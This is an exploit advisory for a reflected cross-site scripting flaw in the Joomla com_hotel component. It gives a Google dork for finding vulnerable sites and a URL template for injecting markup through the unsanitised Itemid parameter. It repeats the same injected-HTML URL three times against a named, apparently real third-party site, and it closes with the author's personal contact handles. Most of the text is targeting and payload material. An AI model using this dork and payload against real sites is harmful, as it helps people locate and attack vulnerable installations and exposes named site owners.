# Exploit Title: Joomla Component com_hotel
# Date: 2020-05-05
# Author: Milad Karimi
# Contact: miladgrayhat@gmail.com
# Google Dork: inurl:index.php?option=com_hotel
# Version: 1.0
# Tested on: windows 10 , firefox
# CVE : N/A
# Example: http://www.site.com/index.php?option=com_hotel&Itemid=[XSS]
http://www.aldeiajerome.cv/index.php?option=com_hotel&Itemid=112"><h1>XSS3D By Milad Karimi</h1>&action=edit&lang=en
http://www.aldeiajerome.cv/index.php?option=com_hotel&Itemid=112"><h1>XSS3D By Milad Karimi</h1>&action=edit&lang=en
http://www.aldeiajerome.cv/index.php?option=com_hotel&Itemid=112"><h1>XSS3D By Milad Karimi</h1>&action=edit&lang=en
# "Itemid” parameter not sanitized you could inject a XSS vector on the URL and get reflected on the screen.
************************
* ==> Contact Me :
* Telegram : @Ex3ptionaL
* Email : miladkarimi311@yahoo.com Email: miladgrayhat@gmail.com
* Instagram : @m.i.l.a.d_._k.a.r.i.m.i
************************